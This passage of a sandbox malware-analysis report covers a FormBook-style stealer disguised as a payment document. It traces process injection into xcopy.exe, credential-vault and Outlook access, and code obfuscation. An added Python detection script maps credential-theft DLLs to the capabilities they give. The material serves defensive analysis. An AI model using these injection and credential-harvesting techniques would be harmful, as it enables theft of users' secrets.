Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe    Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe    Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe    Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: version.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: devobj.dll
Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe    Section loaded: wininet.dll
Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe    Section loaded: mswsock.dll
Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe    Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe    Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe    Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe    Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder    Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: PAYMENT SWIFT COPY.exe    Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PAYMENT SWIFT COPY.exe    Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: PAYMENT SWIFT COPY.exe    Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: xcopy.pdbUGP    source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmp, NCchtKNKiPqC.exe, 0000000D.00000002.1981731850.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000002.4140397411.00000000008EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP    source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1867464774.0000000002B63000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1869081225.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.000000000305E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1981470366.0000000002896000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002D9E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1983090305.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb    source: PAYMENT SWIFT COPY.exe, PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 0000000F.00000003.1867464774.0000000002B63000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1869081225.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.000000000305E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1981470366.0000000002896000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002D9E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1983090305.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: xcopy.pdb    source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmp, NCchtKNKiPqC.exe, 0000000D.00000002.1981731850.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000002.4140397411.00000000008EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb    source: drfYhRLxnrcfFY.exe, 0000000E.00000000.1789131434.00000000007BF000.00000002.00000001.01000000.0000000D.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4139832157.00000000007BF000.00000002.00000001.01000000.0000000D.sdmp
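The module list above carries a detection point that is easy to miss in the noise: xcopy.exe, a file-copy utility with no network or credential-handling function, loads wininet.dll, winhttp.dll, ieframe.dll, winsqlite3.dll, vaultcli.dll and dpapi.dll, and then opens the Outlook profile key. That is the signature of the FormBook payload having been injected into a legitimate Windows binary to harvest browser and mail credentials and talk to its C2. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses a few module-load lines constructed in the report's own "Source: ... Section loaded: ..." format and flags built-in utilities that load DLLs outside their purpose. The LOLBIN list, the DLL-to-capability mapping and the two-hit threshold are the author's assumptions, not a vendor rule set.

```python
"""Flag built-in Windows utilities that load credential-theft or network DLLs.

Added example for this report, not part of the Joe Sandbox output or the sample.
Input is a list of module-load lines in the report's own
"Source: <image>    Section loaded: <dll>" format.
"""
import ntpath
import re
from collections import defaultdict

# Constructed sample input, copied from the xcopy.exe, schtasks.exe and
# PAYMENT SWIFT COPY.exe entries in the report.
SAMPLE_EVENTS = r"""
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\xcopy.exe    Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe    Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe    Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Section loaded: amsi.dll
"""

# Author's assumption: DLLs that a file-copy or task-scheduling utility has no
# reason to load, with the capability each one hands an injected payload.
SUSPICIOUS_DLLS = {
    "vaultcli.dll": "Credential Manager (Windows Vault) read access",
    "winsqlite3.dll": "SQLite reader, as used on browser login/history databases",
    "dpapi.dll": "DPAPI unprotect of saved browser and mail secrets",
    "wininet.dll": "HTTP client, possible C2 channel",
    "winhttp.dll": "HTTP client, possible C2 channel",
}

# Author's assumption: living-off-the-land binaries that FormBook-style
# stealers use as injection targets.
LOLBIN_IMAGES = {"xcopy.exe", "schtasks.exe", "explorer.exe"}

# Non-greedy image match stops at the first ".exe", so paths with spaces
# ("PAYMENT SWIFT COPY.exe") still parse.
LINE_RE = re.compile(
    r"Source:\s*(?P<image>.+?\.exe)\s+Section loaded:\s*(?P<dll>\S+)", re.IGNORECASE
)


def parse_events(text):
    """Return (image_basename, dll) pairs, lower-cased, for every module-load line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            image = ntpath.basename(m.group("image")).lower()
            events.append((image, m.group("dll").lower()))
    return events


def find_injected_lolbins(events, min_hits=2):
    """Map each LOLBIN that loaded at least min_hits suspicious DLLs to its hits.

    Requiring more than one hit keeps a single incidental load (for example
    wininet.dll pulled in by a shell extension) from raising an alert on its own.
    """
    loads = defaultdict(set)
    for image, dll in events:
        if image in LOLBIN_IMAGES and dll in SUSPICIOUS_DLLS:
            loads[image].add(dll)
    return {
        image: sorted((dll, SUSPICIOUS_DLLS[dll]) for dll in dlls)
        for image, dlls in loads.items()
        if len(dlls) >= min_hits
    }


if __name__ == "__main__":
    for image, hits in find_injected_lolbins(parse_events(SAMPLE_EVENTS)).items():
        print(f"{image}: probable injected payload")
        for dll, reason in hits:
            print(f"  {dll:16} {reason}")
```

On the sample above only xcopy.exe is reported, with all four credential and network DLLs it loaded; schtasks.exe loads nothing outside the suspicious set and the sample itself is not a LOLBIN, so neither is listed. The same parser works on Sysmon event 7 (ImageLoaded) exports once the field names are mapped.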

                Data Obfuscation

Source: 0.2.PAYMENT SWIFT COPY.exe.57b0000.5.raw.unpack, RK.cs    .Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.cs    .Net Code: Mx3ZaMMKsG System.Reflection.Assembly.Load(byte[])
Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.cs    .Net Code: Mx3ZaMMKsG System.Reflection.Assembly.Load(byte[])
Source: 0.2.PAYMENT SWIFT COPY.exe.476dbb0.0.raw.unpack, k0D0gf3cPpP3GpvRZo.cs    .Net Code: Mx3ZaMMKsG System.Reflection.Assembly.Load(byte[])
Source: 0.2.PAYMENT SWIFT COPY.exe.3d18bc0.3.raw.unpack, RK.cs    .Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: PAYMENT SWIFT COPY.exe    Static PE information: 0xB570BB47 [Fri Jun 18 05:21:11 2066 UTC]
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 0_2_010CF288 pushfd ; iretd    0_2_010CF291
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00411946 push ebp; iretd    8_2_00411947
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00405172 push ss; ret    8_2_00405174
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401900 push ss; ret    8_2_00401902
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_004031D0 push eax; ret    8_2_004031D2
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00408208 push eax; retf    8_2_0040820B
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00418238 push ebx; retf    8_2_0041823E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_004143E1 push cs; iretd    8_2_004143EF
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_004173FA push 36BCB849h; ret    8_2_00417406
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00417407 push 36BCB849h; ret    8_2_00417405
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401D77 push ss; ret    8_2_00401D8E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401DE2 push ss; ret    8_2_00401D8E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401DE4 push ss; ret    8_2_00401D8E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401DF1 push ss; ret    8_2_00401D8E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401DF3 push ss; ret    8_2_00401D8E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401D8F push ss; ret    8_2_00401D8E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401E00 push ss; ret    8_2_00401D8E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401E02 push ss; ret    8_2_00401D8E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401E14 push ss; ret    8_2_00401D8E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00401EDA push ebp; ret    8_2_00401EE8
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_00413FFA push ebp; ret    8_2_00414005
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_018A225F pushad ; ret    8_2_018A27F9
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_018A27FA pushad ; ret    8_2_018A27F9
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_018D09AD push ecx; mov dword ptr [esp], ecx    8_2_018D09B6
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_018A283D push eax; iretd    8_2_018A2858
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe    Code function: 8_2_018A1368 push eax; iretd    8_2_018A1369
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Code function: 9_2_0103F288 pushfd ; iretd    9_2_0103F291
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Code function: 13_2_0158C06D push edi; ret    13_2_0158C06F
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Code function: 13_2_0158C54D pushfd ; ret    13_2_0158C54E
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Code function: 13_2_0158C54F push 8B015167h; ret    13_2_0158C554
Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe    Code function: 13_2_0158C9D7 push edi; ret    13_2_0158C9D9
Source: PAYMENT SWIFT COPY.exe    Static PE information: section name: .text entropy: 7.764765019063298
Source: NCchtKNKiPqC.exe.0.dr    Static PE information: section name: .text entropy: 7.764765019063298
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, F1hoFycFM5Y5Ngw3fwx.cs    High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CChXPcG3kU', 'eQXX2txWSn', 'vdVXsTtvOD', 'FyBXXMlxY3', 'eA9XNViZ5p', 'HokXUnCUH3', 'fA1XJBh6Eq'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, PJXovGTZAcp6iKichi.cs    High entropy of concatenated method names: 'kwbbd09QKg', 'EP3bkqVT6J', 'uu1bY0OdlA', 'mMEbL2GNTc', 'O3tbBFJl1Q', 'hElbD9ofg7', 'JJAbK7uFvG', 'wD5bWk5f97', 'D5QbFB7jUk', 'dV0b57A6bA'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, k0D0gf3cPpP3GpvRZo.cs    High entropy of concatenated method names: 'mI5ofMYQmY', 'wNpou1NjDt', 'MySoEsTPWr', 'O9Ho1MFtN0', 'GnPorR7372', 'wTHoyhZJgO', 'kfsotyVStc', 'd1foRqJYWw', 'FTTo3L8GKH', 'EviolnA18I'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, OMT594dTSdtC6Vaito.cs    High entropy of concatenated method names: 'aaktuvIXvY', 'vYVt1cvfHJ', 'lOOtyvauoi', 'lysyTjZEKr', 'Hjoyz9jJOn', 'z06tChJPDp', 'AI0tGFPYam', 'CMdtSyVyd2', 'DeStoPBSH5', 'oc4tZe4WgC'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, FV0I8Vujxc8EO1wcj8.cs    High entropy of concatenated method names: 'wfU7FpByET', 'dp57ixCcu8', 'zPZ7ATsxfJ', 'YBh78VL9d1', 'sLi7LwY1AD', 'p8c7qYhvnP', 'yAu7BbYuPV', 'YG77DBfmv8', 'M2t7x5Gkqp', 'lLQ7KUb4GQ'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, swhIR3rP3Gdh5C91vH.cs    High entropy of concatenated method names: 'zb4P78he0v', 'CtMP6OqMxX', 'kJNPPpnWux', 'PTmPsmb4Br', 'lSoPNoCuIn', 'oAyPJjBnB5', 'Dispose', 'TJBgu21IWN', 'L5LgEHrCoK', 's16g195FEo'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, T8S8QdndXjceh7mGiN.cs    High entropy of concatenated method names: 'OEha9AGqa', 'hKmc3Gcea', 'QLTM3WmlK', 'Sil0gMUPV', 'oDKkLCb7P', 'SxNpWr5Qd', 'xnSDAbbWFlocjQYTX4', 'iBg5gCNZHsciZS4Fpd', 'KqggGtaTU', 'bbe2CkRjL'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, ykgIq6WG7bv9a2stL3.cs    High entropy of concatenated method names: 'lbyyf955uJ', 'Xt2yE9Eseo', 'TDTyrmN9DS', 'yl9ytuYklq', 'hUXyRJ1DXy', 'mlsrnJ1Npi', 'dLnrwcpfpp', 'WHkr9wMYLf', 'luLrOYrrM9', 'HNLrhsUe0L'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, gEvhqmKVs6HnbMfB1g.cs    High entropy of concatenated method names: 'Kf621BA7wa', 'wwK2rvHDM7', 'hYx2yv0U3k', 'wMm2tr0P5c', 'BcM2PvAiVy', 'xYS2R6MXib', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, PP4QjQzKR5XbP7jByn.cs    High entropy of concatenated method names: 'IJP2MbOiBh', 'BQy2dDpbOP', 'uND2kbPPVU', 'yEG2YqPME9', 'L4M2LsgvSt', 'zU12BacwMv', 'ASF2DfdCoG', 'aaa2JhRlHZ', 'Vu42mVjJy8', 'cQs2vx7YeE'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, Bq0dAq6yru0GTY6We8.cs    High entropy of concatenated method names: 'Dispose', 'RvRGhHLAsg', 'OksSLA1yTO', 'h1UXn5wZ4T', 'HmkGT8HGIb', 'djNGz3rGfQ', 'ProcessDialogKey', 'tl8SCclk5h', 'avwSGIOvMT', 'TW6SS3ADXc'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, ISRQMalEKfR4LIwPe7.cs    High entropy of concatenated method names: 'Wff1cthM4q', 'p801MNrpqB', 'w5T1diN3vd', 'bk91kxawV7', 'GOB17OCFW9', 'jjB1VDMQIa', 'yxf16AXp5D', 'be31g6FjJV', 'eSl1PxHiob', 'zh512BcFVu'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, avQnqLFlTekH9ll8IC.cs    High entropy of concatenated method names: 'J1IGt8Fq9I', 'isWGRUE1T0', 'b0hGlTJpac', 'VwRGjdqjuP', 'CHXG7EVpCa', 'e60GVBKnSR', 'YlCrG1jcLtHTEx3ZwA', 'r7WRmIq24ZjPVeGSC7', 'eryPcuITIWhkf2mrVp', 'riAGGi9num'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, N13ITUDLcClkUqkPFe.cs    High entropy of concatenated method names: 'yNPEAlaFOg', 'OXGE8AsuAr', 'qtWEQD41ZH', 'ypaEHEiE6F', 'l6GEnXRfwX', 'PBKEwIsd34', 'uMpE9JwSJG', 'eBWEOQqC1F', 'CGBEhG1wc1', 'yEQETloY7c'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, inHljhc5ZR0P7coXGSS.cs    High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'giA25YDRyL', 'ICt2ikkCNQ', 'NDy2eNn1TP', 'iMt2AdsNjl', 'ty028VYdwR', 'xIl2QatxOn', 'u0E2HyevW7'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, xS9NrZ97ogRYEea3oV.cs    High entropy of concatenated method names: 'wlVtm4M6sZ', 'dectvBVcQC', 'RyKta61fU9', 'jdStcgON40', 'dC0tIKb7Tc', 'RHftMlP1Ze', 'm69t06c8nQ', 'ksTtduLkxh', 'Nlqtk5ZpUO', 'DlvtpEHRpq'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, EgUlpqHfqSfLHYoWk0.cs    High entropy of concatenated method names: 'Y8VrImx7m7', 'xRTr0nnO4U', 'ful1qtJZIS', 'Y4A1B5Ci3u', 'gdX1D6PcN0', 'Cud1xjWDJs', 'LiT1KtjKMj', 'wGw1WwAju2', 'bsJ14ueFQa', 'jgq1Frd9jt'
Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, kiljDFtHHOnR21nEXp.cs    High entropy of concatenated method names: 'r9K6O6ZvSe', 'fIt6Ts8mIS', 'iGZgCFT2Um', 'DZFgG4v91j', 'FDG650TbnB', 'xOr6ihdgEO', 'LIw6ejVouq', 'zpN6A8skXZ', 'Pe068SsMa1', 'kq06QYbnjo'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, PJvA2ZccqpmGc96co5h.csHigh entropy of concatenated method names: 'd8c2TdZBDG', 'SCX2zI9IXg', 'AncsC2c4hg', 'aNcsGICCin', 'bOasSNHcoj', 'nM6soW6Xil', 'fDrsZMDVte', 'sbAsfQFXeX', 'dXXsushsmT', 'IIEsEqV00Z'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, PiHwiKeblEXxf6olbN.csHigh entropy of concatenated method names: 'ToString', 'sRpV53eGe6', 'mKqVLZS7g8', 'TyfVqiC8nc', 'XvfVBNIOhx', 'GQ8VDWWNYu', 'nDyVxQoTZS', 'e81VKjc9U2', 'ea0VWjV7gd', 'rewV4d9EoN'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, T63F1I1LuuP7kaS84r.csHigh entropy of concatenated method names: 'dBtPY7TBDy', 'mnBPLXei57', 'TNnPqad45m', 'G0KPBvnSEd', 'C9RPD23EcG', 'KkJPxf2BKr', 'ThmPKsUc5N', 'D4WPWOpkFN', 'kLiP4fnMtj', 'ublPFC1TKX'
                Source: 0.2.PAYMENT SWIFT COPY.exe.7570000.6.raw.unpack, Up5iKfZCk0jSbBntEh.csHigh entropy of concatenated method names: 'JXQ6lJyNGr', 'W176jDIcwh', 'ToString', 'ztm6uuktfD', 'C2b6EVSBNN', 'Wh961gHEkk', 'onO6rbTDPY', 'SJ16ykbOgp', 'gEN6ttxe4B', 'ked6RbeA8A'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, F1hoFycFM5Y5Ngw3fwx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CChXPcG3kU', 'eQXX2txWSn', 'vdVXsTtvOD', 'FyBXXMlxY3', 'eA9XNViZ5p', 'HokXUnCUH3', 'fA1XJBh6Eq'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, PJXovGTZAcp6iKichi.csHigh entropy of concatenated method names: 'kwbbd09QKg', 'EP3bkqVT6J', 'uu1bY0OdlA', 'mMEbL2GNTc', 'O3tbBFJl1Q', 'hElbD9ofg7', 'JJAbK7uFvG', 'wD5bWk5f97', 'D5QbFB7jUk', 'dV0b57A6bA'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, k0D0gf3cPpP3GpvRZo.csHigh entropy of concatenated method names: 'mI5ofMYQmY', 'wNpou1NjDt', 'MySoEsTPWr', 'O9Ho1MFtN0', 'GnPorR7372', 'wTHoyhZJgO', 'kfsotyVStc', 'd1foRqJYWw', 'FTTo3L8GKH', 'EviolnA18I'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, OMT594dTSdtC6Vaito.csHigh entropy of concatenated method names: 'aaktuvIXvY', 'vYVt1cvfHJ', 'lOOtyvauoi', 'lysyTjZEKr', 'Hjoyz9jJOn', 'z06tChJPDp', 'AI0tGFPYam', 'CMdtSyVyd2', 'DeStoPBSH5', 'oc4tZe4WgC'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, FV0I8Vujxc8EO1wcj8.csHigh entropy of concatenated method names: 'wfU7FpByET', 'dp57ixCcu8', 'zPZ7ATsxfJ', 'YBh78VL9d1', 'sLi7LwY1AD', 'p8c7qYhvnP', 'yAu7BbYuPV', 'YG77DBfmv8', 'M2t7x5Gkqp', 'lLQ7KUb4GQ'
                Source: 0.2.PAYMENT SWIFT COPY.exe.47f85d0.4.raw.unpack, swhIR3rP3Gdh5C91vH.csHigh entropy of concatenated method names: 'zb4P78he0v', 'CtMP6OqMxX', 'kJNPPpnWux', 'PTmPsmb4Br', 'lSoPNoCuIn', 'oAyPJjBnB5', 'Dispose', 'TJBgu21IWN', 'L5LgEHrCoK', 's16g195FEo'
